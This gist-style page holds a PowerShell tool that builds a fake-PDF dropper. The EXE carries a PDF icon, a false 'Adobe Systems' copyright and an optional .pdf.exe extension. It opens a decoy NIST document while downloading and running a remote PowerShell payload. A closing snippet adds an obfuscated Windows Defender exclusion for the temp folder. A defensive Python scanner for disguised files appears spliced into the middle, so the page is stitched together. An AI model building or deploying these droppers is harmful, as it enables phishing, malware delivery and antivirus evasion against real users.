Last active June 2, 2025 07:43
<#
.SYNOPSIS
Create dropper.EXE that downloads\Opens NIST.SP.800-12r1.PDF (decoy) and Executes Payload.ps1
Author: @r00t-3xp10it
Tested Under: Windows 11 (26100) x64 bits
Required Dependencies: ps2exe.ps1
Optional Dependencies: Rename-Item
PS cmdlet Dev version: v1.1.9
.DESCRIPTION
This script demonstrates how to social engineer a target
user into downloading\Executing Payload.ps1 in the background while
also downloading and opening one PDF file (decoy file)
.NOTES
Payload.ps1 only displays one MSG to demonstrate that it executed successfully.
Warning: Spoofing the dropper extension (NIST.SP.800-12r1.pdf.exe) might trigger AV detection.
.Parameter PDFfile
The legit NIST.SP.800-12r1.PDF download url link
.Parameter PayloadFile
The Payload.ps1 file download url link
.Parameter SpoofExtension
Spoof NIST.SP.800-12r1.exe extension? (NIST.SP.800-12r1.pdf.exe)
.Parameter DelayExecution
The delay time (seconds) between PDFfile and PayloadFile execution
.EXAMPLE
PS> .\FakePDF.ps1 -DelayExecution "3" -SpoofExtension
Create dropper file (NIST.SP.800-12r1.pdf.exe) that downloads\Executes (NIST.SP.800-12r1.pdf) and downloads\Executes (Payload.ps1)
.EXAMPLE
PS> .\FakePDF.ps1 -PDFfile "https://www.ftc.gov/system/files/attachments/cybersecurity-small-business/cybersecuirty_sb_factsheets_all.pdf"
Create dropper file (cybersecuirty_sb_factsheets_all.exe) that downloads\Executes (cybersecuirty_sb_factsheets_all.pdf) and downloads\Executes (Payload.ps1)
.EXAMPLE
PS> .\FakePDF.ps1 -PayloadFile "https://raw.githubusercontent.com/r00t-3xp10it/redpill/refs/heads/main/bin/Payload.ps1"
Create dropper file (NIST.SP.800-12r1.exe) that downloads\Executes (NIST.SP.800-12r1.pdf) and downloads\Executes (Payload.ps1)
.OUTPUTS
.%%%%%%...%%%%...%%..%%..%%%%%%..........%%%%%...%%%%%...%%%%%%.
.%%......%%..%%..%%.%%...%%..............%%..%%..%%..%%..%%.....
.%%%%....%%%%%%..%%%%....%%%%............%%%%%...%%..%%..%%%%...
.%%......%%..%%..%%.%%...%%..............%%......%%..%%..%%.....
.%%......%%..%%..%%..%%..%%%%%%..........%%......%%%%%...%%.....
................................................................
Author: @r00t-3xp10it - SSA_redteam @2025 v1.1.8
This script demonstrates how to social engineer a target
user into downloading\Executing Payload.ps1 in the background while
also downloading and opening one PDF file (decoy file)
[*] Generated pdf version number: 3.55.33.27
[*] Creating dropper file [MyScriptGUI.ps1]
[*] Download PDF icon file [PDFicon.ico]
[*] Download ps2exe.ps1 [Compile from PS1 to EXE]
[*] Compiling MyScriptGUI.ps1 to NIST.SP.800-12r1.exe and change the icon to .PDF
PS2EXE-GUI v0.5.0.21 by Ingo Karstein, reworked and GUI support by Markus Scholtes
You are using PowerShell 4.0 or above.
Reading input file C:\Users\pedro\onedrive\Ambiente de Trabalho\MyScriptGUI.ps1
Compiling file...
Output file C:\Users\pedro\onedrive\Ambiente de Trabalho\NIST.SP.800-12r1.exe written
[*] Send NIST.SP.800-12r1.exe [3.55.33.27] to target user!
.LINK
https://github.com/r00t-3xp10it
https://gist.github.com/r00t-3xp10it/a18237b299a6efb6c39c72d0a7f6aa2d
#>
[CmdletBinding(PositionalBinding=$false)] param(
[string]$PayloadFile="https://raw.githubusercontent.com/r00t-3xp10it/redpill/refs/heads/main/bin/Payload.ps1",
[string]$PDFfile="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-12r1.pdf",
[string]$DelayExecution="3",
[switch]$SpoofExtension
)
## Local variables
$CmdLetVersion = "v1.1.9"
$StartPath = (Get-Location).Path
$ErrorActionPreference = "SilentlyContinue"
$host.UI.RawUI.WindowTitle = "FakePdf $CmdLetVersion"
## Script Banner
$StartBanner = @"
.%%%%%%...%%%%...%%..%%..%%%%%%..........%%%%%...%%%%%...%%%%%%.
.%%......%%..%%..%%.%%...%%..............%%..%%..%%..%%..%%.....
.%%%%....%%%%%%..%%%%....%%%%............%%%%%...%%..%%..%%%%...
.%%......%%..%%..%%.%%...%%..............%%......%%..%%..%%.....
.%%......%%..%%..%%..%%..%%%%%%..........%%......%%%%%...%%.....
................................................................
Author: @r00t-3xp10it - SSA_redteam @2025 $CmdLetVersion
This script demonstrates how to social engineer a target
user into downloading\Executing Payload.ps1 in the background while
also downloading and opening one PDF file (decoy file)
"@;
write-host $StartBanner -ForegroundColor Blue
Start-Sleep -Milliseconds 500
echo ""
## Generating pdf version number (three random octets appended to a leading "3.")
write-host "[*] " -ForeGroundColor Blue -NoNewLine
$PdfVersionNumber = (1..90|Get-Random -Count 3) -join "."
write-host "Generated pdf version number: " -NoNewLine
write-host "3.${PdfVersionNumber}" -ForeGroundColor Yellow
## Make sure -PDFfile variable contains one valid URL link (http or https, ending in .pdf)
If(($PDFfile -iNotMatch '^(http(s)?://)') -or ($PDFfile -iNotMatch '\.pdf$'))
{
write-host "[x] error: -PDFfile 'url' must be one valid URL link" -ForeGroundColor Red
write-host "[*] example: " -ForeGroundColor Blue -NoNewLine
write-host "https://" -ForeGroundColor Green -NoNewLine
write-host "nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-12r1" -NoNewLine
write-host ".pdf" -ForeGroundColor Green;echo ""
return
}
## Make sure -PayloadFile variable contains one valid URL link (http or https, ending in .ps1)
If(($PayloadFile -iNotMatch '^(http(s)?://)') -or ($PayloadFile -iNotMatch '\.ps1$'))
{
write-host "[x] error: -PayloadFile 'url' must be one valid URL link" -ForeGroundColor Red
write-host "[*] example: " -ForeGroundColor Blue -NoNewLine
write-host "https://" -ForeGroundColor Green -NoNewLine
write-host "raw.githubusercontent.com/r00t-3xp10it/redpill/refs/heads/main/bin/Payload" -NoNewLine
write-host ".ps1" -ForeGroundColor Green;echo ""
return
}
## Extract filename from PDFfile variable path
$PdfName = [System.IO.Path]::GetFileNameWithoutExtension($PDFfile)
If([string]::IsNullOrEmpty($PdfName))
{
write-host "[x] error: fail to extract filename from -PDFfile 'url' path." -ForeGroundColor Red
$PDFfile = "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-12r1.pdf"
$PdfName = "NIST.SP.800-12r1" ## ReDefine PDF filename
Start-Sleep -Seconds 1
}
## Extract filename from PayloadFile variable path
$PayloadName = [System.IO.Path]::GetFileNameWithoutExtension($PayloadFile)
If([string]::IsNullOrEmpty($PayloadName))
{
write-host "[x] error: fail to extract filename from -PayloadFile 'url' path." -ForeGroundColor Red
$PayloadFile = "https://raw.githubusercontent.com/r00t-3xp10it/redpill/refs/heads/main/bin/Payload.ps1"
$PayloadName = "Payload" ## ReDefine payload filename
Start-Sleep -Seconds 1
}
## Dropper file contents (Download\Execute NIST.pdf and payload.PS1); variables expand at generation time
$PS1File = @("iwr -Uri `"$PDFfile`" -OutFile `"${PdfName}.pdf`"|Unblock-File
.\${PdfName}.pdf
Start-Sleep -Seconds $DelayExecution
iwr -Uri `"$PayloadFile`" -OutFile `"${PayloadName}.ps1`"|Unblock-File
.\${PayloadName}.ps1")
## Create dropper file
write-host "[*] " -ForegroundColor Blue -NoNewline
write-host "Creating dropper file [MyScriptGUI.ps1]"
echo $PS1File|Out-File "$StartPath\MyScriptGUI.ps1" -Encoding string -Force
Start-Sleep -Seconds 1
## Check if file has been created
If(-not(Test-Path -Path "$StartPath\MyScriptGUI.ps1" -EA SilentlyContinue))
{
Write-Host "[x] error: fail to create $StartPath\MyScriptGUI.ps1" -ForegroundColor Red;echo ""
return
}
## Download PDF icon
write-host "[*] " -ForegroundColor Blue -NoNewline
write-host "Download PDF icon file [PDFicon.ico]"
iwr -Uri "https://raw.githubusercontent.com/r00t-3xp10it/FakeImageExploiter/refs/heads/master/icons/PDF_24287.ico" -OutFile "$StartPath\PDFicon.ico"|Unblock-File
Start-Sleep -Seconds 1
## Check if file has been downloaded
If(-not(Test-Path -Path "$StartPath\PDFicon.ico" -EA SilentlyContinue))
{
Write-Host "[x] error: fail to download $StartPath\PDFicon.ico" -ForegroundColor Red;echo ""
return
}
## Download ps1 to exe
write-host "[*] " -ForegroundColor Blue -NoNewline
write-host "Download ps2exe.ps1 [compile from PS1 to EXE]"
iwr -Uri "https://raw.githubusercontent.com/r00t-3xp10it/PandoraBox/refs/heads/master/PandoraBox/PS2EXE/ps2exe.ps1" -OutFile "$StartPath\ps2exe.ps1"|Unblock-File
Start-Sleep -Seconds 1
## Check if file has been downloaded
If(-not(Test-Path -Path "$StartPath\ps2exe.ps1" -EA SilentlyContinue))
{
Write-Host "[x] error: fail to download $StartPath\ps2exe.ps1" -ForegroundColor Red;echo ""
return
}
## Compile MyScriptGUI.ps1 to NIST.exe
write-host "[*] " -ForegroundColor Blue -NoNewline
write-host "Compiling MyScriptGUI.ps1 to ${PdfName}.exe and change the icon to .PDF";echo ""
## Compiling dropper.PS1 to dropper.EXE (and changing the icon) is done by invoking the ps2exe.ps1 script by Ingo Karstein
.\ps2exe.ps1 -inputFile "$StartPath\MyScriptGUI.ps1" -outputFile "$StartPath\${PdfName}.exe" -iconFile "$StartPath\PDFicon.ico" -title "$PdfName" -product "$PdfName" -copyright "Adobe Systems" -version "3.${PdfVersionNumber}" -noConsole -noError
Start-Sleep -Seconds 2
## Check if file has been created
If(-not(Test-Path -Path "$StartPath\${PdfName}.exe" -EA SilentlyContinue))
{
Write-Host "[x] error: fail to create $StartPath\${PdfName}.exe" -ForegroundColor Red;echo ""
return
}
## Spoof dropper extension?
If($SpoofExtension.IsPresent)
{
write-host "[*] " -ForegroundColor Blue -NoNewline
write-host "Spoofing file extension (${PdfName}.pdf.exe)"
Rename-Item -Path "$StartPath\${PdfName}.exe" -NewName "$StartPath\${PdfName}.pdf.exe" -Force
Start-Sleep -Seconds 2
## Check if file has been created
If(-not(Test-Path -Path "$StartPath\${PdfName}.pdf.exe" -EA SilentlyContinue))
{
Write-Host "[x] error: fail to create $StartPath\${PdfName}.pdf.exe" -ForegroundColor Red;echo ""
return
}
}
## Final msg
write-host "[*] " -ForegroundColor Blue -NoNewline
If($SpoofExtension.IsPresent)
{
write-host "Send " -NoNewLine
write-host "${PdfName}.pdf.exe " -ForegroundColor Yellow -NoNewLine
write-host "[3.${PdfVersionNumber}] to target user!"
}
Else
{
write-host "Send " -NoNewLine
write-host "${PdfName}.exe " -ForegroundColor Yellow -NoNewLine
write-host "[3.${PdfVersionNumber}] to target user!"
}
## CLEAN UP
remove-item -Path "$StartPath\ps2exe.ps1" -Force
remove-item -Path "$StartPath\PDFicon.ico" -Force
remove-item -Path "$StartPath\${PdfName}.pdf" -Force
remove-item -Path "$StartPath\MyScriptGUI.ps1" -Force
remove-item -Path "$StartPath\${PayloadName}.ps1" -Force
echo ""
## Add this code to the beginning of the $PS1File variable
cd $Env:TMP
## Make sure shell is running with administrator privileges
$IsClientAdmin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -Match "S-1-5-32-544")
If($IsClientAdmin -iNotMatch '^(True)$')
{
write-host " - " -ForegroundColor Red -NoNewline
write-host "Error: " -ForegroundColor DarkGray -NoNewline
write-host "Administrator privileges required ..`n" -ForegroundColor Red
return
}
## Create defender %TMP% exclusion
$CmdLime = "S@t-MpPr@f@r@nc@ -@xclusionPath" -replace '@','e'
Start-Process -WindowStyle Hidden powershell -ArgumentList "$CmdLime $Env:TMP -Force" -Wait
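A defender-side triage script, added here as an example and not part of the gist: it flags files whose name and leading bytes contradict each other, which is the mismatch the lure above relies on (a PE image from ps2exe carrying a PDF icon and, with -SpoofExtension, a .pdf.exe double extension that Explorer shows as ".pdf" while "hide extensions for known file types" is on). The extension lists and the sample files in demo() are constructed for the example.

```python
"""Flag files disguised as documents: PE bytes under a document name, or a
document extension followed by an executable one (NIST.SP.800-12r1.pdf.exe)."""
from __future__ import annotations
from pathlib import Path
import tempfile

# Constructed lists for this example; extend as needed.
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta"}
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}


def classify(name: str, head: bytes) -> list[str]:
    """Return the reasons a file called `name` whose first bytes are `head` looks disguised."""
    suffixes = [s.lower() for s in Path(name).suffixes]  # every dotted part after the stem
    final = suffixes[-1] if suffixes else ""
    is_pe = head.startswith(b"MZ")       # DOS/PE executable header
    is_pdf = head.startswith(b"%PDF-")   # every real PDF starts with this
    reasons: list[str] = []
    if len(suffixes) >= 2 and suffixes[-2] in DOC_EXTS and final in EXEC_EXTS:
        reasons.append(f"double extension {suffixes[-2]}{final}")
    if is_pe and final in DOC_EXTS:
        reasons.append(f"PE image named with document extension {final}")
    if final == ".pdf" and head and not is_pdf:
        reasons.append("content is not a PDF (missing %PDF- header)")
    return reasons


def scan(directory: Path) -> dict[str, list[str]]:
    """Classify every regular file in `directory`; only flagged files are returned."""
    findings: dict[str, list[str]] = {}
    for path in sorted(directory.iterdir()):
        if path.is_file():
            with path.open("rb") as fh:
                reasons = classify(path.name, fh.read(8))
            if reasons:
                findings[path.name] = reasons
    return findings


def demo() -> dict[str, list[str]]:
    """Build a constructed sample directory (fake MZ stubs, one real-looking PDF) and scan it."""
    stub = b"MZ\x90\x00" + b"\0" * 60
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "NIST.SP.800-12r1.pdf.exe").write_bytes(stub)                # spoofed dropper name
        (d / "invoice.pdf").write_bytes(stub)                             # executable renamed to .pdf
        (d / "NIST.SP.800-12r1.pdf").write_bytes(b"%PDF-1.7\n%constructed")  # genuine decoy
        (d / "setup.exe").write_bytes(stub)                               # plain exe, not flagged
        return scan(d)


if __name__ == "__main__":
    for name, why in demo().items():
        print(f"{name}: {'; '.join(why)}")
```

The plain NIST.SP.800-12r1.exe variant is not caught by name alone; its tell is the PDF icon and the "Adobe Systems" copyright string in the version resource, which this name/magic check does not inspect.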
Parameters List
* Document.PDF and Payload.PS1 must be hosted on a web server so this script can download them
Download script
Execute script (with default parameters)
Screenshot